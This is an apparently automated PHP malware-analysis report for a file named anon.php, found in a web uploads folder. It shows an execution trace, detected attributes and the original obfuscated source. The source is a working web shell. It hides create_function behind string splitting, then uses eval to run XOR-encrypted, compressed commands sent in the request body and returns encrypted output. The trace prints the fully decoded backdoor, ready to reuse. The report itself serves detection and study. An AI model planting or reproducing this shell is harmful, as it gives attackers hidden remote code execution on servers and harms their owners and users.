anon.php

md5: 8b6b7b2c77e5043d85f9bb73c526e7f4

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Traces)
base64_encode (Traces)

Execution
eval (Traces)

Files
file_get_contents (Traces)

Input
php:\/\/input (Traces)

Deobfuscated PHP code
Failed to deobfuscate code
Execution traces
data/traces/8b6b7b2c77e5043d85f9bb73c526e7f4_trace-1676243296.81.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:08:42.707823]
1	0	1	0.000198	393512
1	3	0	0.000260	396088	{main}	1		/var/www/html/uploads/anon.php	0	0
1		A						/var/www/html/uploads/anon.php	2	$o = 'utbsbs"),$m)bs==1) {@ob_starbst();@bsbsevabsl(@gzuncompbsress(@x(@babsbssebs64bs_decobsde($bsm[1]),$k)));$o=@obbsbs_'
2	4	0	0.000298	396088	str_replace	0		/var/www/html/uploads/anon.php	3	3	'Dz'	''	'DzcrDzeate_DzfDzuDznDzction'
2	4	1	0.000316	396224
2	4	R			'create_function'
1		A						/var/www/html/uploads/anon.php	3	$A = 'create_function'
1		A						/var/www/html/uploads/anon.php	4	$O = '$k="2bs3bfafbs5e";$bskh="d479bsbs808304e1";bs$kbsf="332a0b7a7bs3d4";$bsp="pumykZXbsj8bs5jIFVWY";bsfunctiobsn x($tbs,b'
1		A						/var/www/html/uploads/anon.php	5	$v = '++){$o.=$t{bs$i}^$k{$bsj};bsbs}}returbsn $bso;}if (@preg_matbscbsh("/$kh(.+)$kfbs/",@bsfile_gbsebst_conbstents("php:/bs/inp'
1		A						/var/www/html/uploads/anon.php	6	$c = 'get_contents()bs;@ob_ebsnd_cbslean(bs);$r=@babsse64_encobsde(@xbs(@gzcbsombspress($bsobs)bs,bs$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/anon.php	7	$S = 's$k){$cbs=strlenbs($k);$l=sbstrlen($bstbs)bs;$o="";for($i=0;bsbs$i<$l;){fbsorbs($j=0bsbsbs;($j<$c&&$i<$l);$j+bsbs+,$i'
2	5	0	0.000425	396768	str_replace	0		/var/www/html/uploads/anon.php	8	3	'bs'	''	'$k="2bs3bfafbs5e";$bskh="d479bsbs808304e1";bs$kbsf="332a0b7a7bs3d4";$bsp="pumykZXbsj8bs5jIFVWY";bsfunctiobsn x($tbs,bs$k){$cbs=strlenbs($k);$l=sbstrlen($bstbs)bs;$o="";for($i=0;bsbs$i<$l;){fbsorbs($j=0bsbsbs;($j<$c&&$i<$l);$j+bsbs+,$i++){$o.=$t{bs$i}^$k{$bsj};bsbs}}returbsn $bso;}if (@preg_matbscbsh("/$kh(.+)$kfbs/",@bsfile_gbsebst_conbstents("php:/bs/inputbsbs"),$m)bs==1) {@ob_starbst();@bsbsevabsl(@gzuncompbsress(@x(@babsbssebs64bs_decobsde($bsm[1]),$k)));$o=@obbsbs_get_contents()bs;@ob_ebsnd_cbslean(bs);'
2	5	1	0.000462	397376
2	5	R			'$k="23bfaf5e";$kh="d479808304e1";$kf="332a0b7a73d4";$p="pumykZXj85jIFVWY";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/anon.php	8	$Y = '$k="23bfaf5e";$kh="d479808304e1";$kf="332a0b7a73d4";$p="pumykZXj85jIFVWY";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000519	396640	create_function	0		/var/www/html/uploads/anon.php	9	2	''	'$k="23bfaf5e";$kh="d479808304e1";$kf="332a0b7a73d4";$p="pumykZXj85jIFVWY";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000601	404680	{internal eval}	1		/var/www/html/uploads/anon.php	9	0
3	7	1	0.000616	404680
3	7	R			NULL
2	6	1	0.000631	403312
2	6	R			'\000lambda_9'
1		A						/var/www/html/uploads/anon.php	9	$q = '\000lambda_9'
2	8	0	0.000658	403248	__lambda_func	1		/var/www/html/uploads/anon.php	9	0
2		A						/var/www/html/uploads/anon.php(9) : runtime-created function	1	$k = '23bfaf5e'
2		A						/var/www/html/uploads/anon.php(9) : runtime-created function	1	$kh = 'd479808304e1'
2		A						/var/www/html/uploads/anon.php(9) : runtime-created function	1	$kf = '332a0b7a73d4'
2		A						/var/www/html/uploads/anon.php(9) : runtime-created function	1	$p = 'pumykZXj85jIFVWY'
3	9	0	0.000719	403304	file_get_contents	0		/var/www/html/uploads/anon.php(9) : runtime-created function	1	1	'php://input'
3	9	1	0.000741	404040
3	9	R			''
3	10	0	0.000754	404024	preg_match	0		/var/www/html/uploads/anon.php(9) : runtime-created function	1	3	'/d479808304e1(.+)332a0b7a73d4/'	''	NULL
3	10	1	0.000804	404184
3	10	R			0
2	8	1	0.000819	403944
1	3	1	0.000827	403944
			0.000855	321640
TRACE END   [2023-02-12 21:08:42.708515]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php
$o='utbsbs"),$m)bs==1) {@ob_starbst();@bsbsevabsl(@gzuncompbsress(@x(@babsbssebs64bs_decobsde($bsm[1]),$k)));$o=@obbsbs_';
$A=str_replace('Dz','','DzcrDzeate_DzfDzuDznDzction');
$O='$k="2bs3bfafbs5e";$bskh="d479bsbs808304e1";bs$kbsf="332a0b7a7bs3d4";$bsp="pumykZXbsj8bs5jIFVWY";bsfunctiobsn x($tbs,b';
$v='++){$o.=$t{bs$i}^$k{$bsj};bsbs}}returbsn $bso;}if (@preg_matbscbsh("/$kh(.+)$kfbs/",@bsfile_gbsebst_conbstents("php:/bs/inp';
$c='get_contents()bs;@ob_ebsnd_cbslean(bs);$r=@babsse64_encobsde(@xbs(@gzcbsombspress($bsobs)bs,bs$k));print("$p$kh$r$kf");}';
$S='s$k){$cbs=strlenbs($k);$l=sbstrlen($bstbs)bs;$o="";for($i=0;bsbs$i<$l;){fbsorbs($j=0bsbsbs;($j<$c&&$i<$l);$j+bsbs+,$i';
$Y=str_replace('bs','',$O.$S.$v.$o.$c);
$q=$A('',$Y);$q();
?>
PHP Malware Analysis

anon.php

md5: 8b6b7b2c77e5043d85f9bb73c526e7f4

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
